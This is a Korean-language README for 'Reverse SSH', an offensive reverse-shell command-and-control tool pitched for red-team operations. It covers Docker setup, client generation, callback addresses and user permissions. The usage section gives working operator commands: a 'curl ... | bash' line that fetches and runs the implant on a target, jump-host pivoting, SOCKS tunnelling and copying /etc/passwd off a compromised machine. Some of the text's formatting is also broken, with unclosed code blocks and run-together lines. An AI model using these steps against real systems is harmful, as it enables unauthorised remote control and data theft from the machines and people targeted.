
SSH 기반 리버스 셸 관리 도구로, 기본 SCP/SFTP 지원, 다중 전송 프로토콜, Windows DLL 생성, 그리고 레드팀 운영을 위한 파일리스 실행을 제공합니다.

(아트 크레딧: https://www.instagram.com/smart.hedgehog.art/)
SSH를 리버스 셸에 사용하고 싶으신가요? 이제 가능합니다.
SCP 및 SFTP 구현http, websockets, tls 등 다양한 네트워크 전송https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1
- [Reverse SSH](#reverse-ssh)
- [TL;DR](#tldr)
- [설정](#설정)
- [기본 사용법](#기본-사용법)
- [스폰서](#스폰서)
- [개인](#개인)
- [기업](#기업)
- [특별 기능](#특별-기능)
- [권한](#권한)
- [자동 재접속](#자동-재접속)
- [리버스 셸 다운로드 (클라이언트 생성 및 내장 HTTP 서버)](#리버스-셸-다운로드-클라이언트-생성-및-내장-http-서버)
- [대체 전송 (HTTP/웹소켓/TLS)](#대체-전송-http웹소켓tls)
- [배시 자동 완성](#배시-자동-완성)
- [Windows DLL 생성](#windows-dll-생성)
- [SSH 서브시스템](#ssh-서브시스템)
- [모든 시스템](#모든-시스템)
- [Linux](#linux)
- [Windows](#windows)
- [Windows 서비스 통합](#windows-서비스-통합)
- [완전한 Windows 셸 지원](#완전한-windows-셸-지원)
- [웹훅](#웹훅)
- [Tun (VPN)](#tun-vpn)
- [파일 없는 실행 (클라이언트가 실행할 실행 파일을 동적으로 다운로드하여 셸로 실행 지원)](#파일-없는-실행-클라이언트가-실행할-실행-파일을-동적으로-다운로드하여-셸로-실행-지원)
- [지원되는 URI 스킴](#지원되는-uri-스킴)
- [도움말](#도움말)
- [Windows 도움말](#windows-도움말)
- [SFTP](#windows-및-sftp)
- [세션 생성 오류 (0xc0000142)](#세션-생성-오류-0xc0000142)
- [`--insecure`로 서버를 시작했는데도 `Failed to handshake` 오류 발생](#--insecure로-서버를-시작했는데도-failed-to-handshake-오류-발생)
- [포그라운드 vs 백그라운드](#포그라운드-vs-백그라운드)
- [기부, 지원, 또는 보답](#기부-지원-또는-보답)
## TL;DR
### 설정
도커 릴리스가 권장됩니다. 올바른 버전의 Golang과 Windows용 크로스 컴파일러가 포함되어 있기 때문입니다.```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh
또는 docker compose:```yaml services: reversessh: image: reversessh/reverse_ssh ports: - "3232:2222" environment: - EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 - RSSH_CONSOLE_LABEL=c2.label - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY} volumes: - ./data:/data
### 기본 사용법```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232
# List all server console commands
catcher$ help
# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25
# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh | bash
# then we can then list what clients are connected
catcher$ ls
Targets
+------------------------------------------+-----------------------------------+
| IDs | Version |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 | |
| dummy.machine | |
| 192.168.0.11:34542 | |
+------------------------------------------+-----------------------------------+
모든 명령어는 도움말을 제공하기 위해 -h 플래그를 지원합니다.
그러면 일반적인 ssh 명령어가 작동하며, rssh 서버를 점프 호스트로 지정하기만 하면 됩니다.```sh
ssh -J your.rssh.server.internal:3232 dummy.machine
ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine
ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine
scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .
## 스폰서
RSSH 프로젝트에 기부해 주신 모든 분들께 진심으로 감사드립니다. 덕분에 이 모든 작업이 가능했습니다!
### 개인
[chikamobina](https://github.com/chikamobina)님의 관대한 기부에 감사드립니다!
[wrighterase (ctrlzero)](https://github.com/wrighterase)님의 풀 리퀘스트와 기부에 감사드립니다!
### 회사
[Carapace](https://carapace.nz/)는 뉴질랜드 기반의 보안 컨설팅 회사로, 매우 재능 있는 팀을 보유하고 있습니다!
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)
## 멋진 기능
### 권한
RSSH 서버는 매우 기본적인 사용자 권한을 지원합니다. `data-directory`/`keys` (`--datadir`로 지정) 폴더(예: `data-directory/keys/jim`)에 있는 사용자는 공개 클라이언트(`authorized_controllee_keys` 파일에서 `owners` 태그가 없거나 빈 `owners` 태그가 있는 경우) 또는 자신에게 특별히 할당된 클라이언트(예: `owners="jim"`)만 볼 수 있는 "사용자"로 지정됩니다.
이는 실행 중에 `access` 명령을 통해 소유한 클라이언트에 대한 접근을 공유하는 사용자나 서버 관리자가 변경할 수 있습니다. 기본적으로 `authorized_keys` 파일에 있는 모든 공개 키는 이전 버전과의 호환성을 유지하기 위해 관리자로 표시됩니다.
`access` 명령으로 변경된 내용은 서버 재부팅 후에도 유지되지 않으며, 특정 클라이언트의 `authorized_controllee_keys` 파일을 편집해야 합니다.
### 자동 콜백
rssh 클라이언트는 콜백 주소를 내장할 수 있습니다.
기본적으로 `link` 명령은 서버의 외부 주소를 내장합니다.
어떤 이유로 바이너리를 수동으로 빌드하는 경우, 환경 변수 `RSSH_HOMESERVER`를 지정하여 클라이언트에 내장할 수 있습니다:```sh
$ RSSH_HOMESERVER=your.rssh.server.internal:3232 make
# Will connect to your.rssh.server.internal:3232, even though no destination is specified
$ bin/client
# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client -d example.com:3232
RSSH 서버는 클라이언트 바이너리를 빌드하고 호스팅할 수 있습니다 (link 명령). 클라이언트를 빌드하고 제공하는 데 선호되는 방법입니다.
기능이 작동하려면 서버가 프로젝트의 bin/ 폴더에 배치되어야 합니다. 클라이언트 소스를 찾아야 하기 때문입니다.
기본적으로 docker 릴리스에는 이 모든 것이 제대로 구축되어 있으며, 사용을 권장합니다.```sh
ssh your.rssh.server.internal -p 3232
catcher$ link -h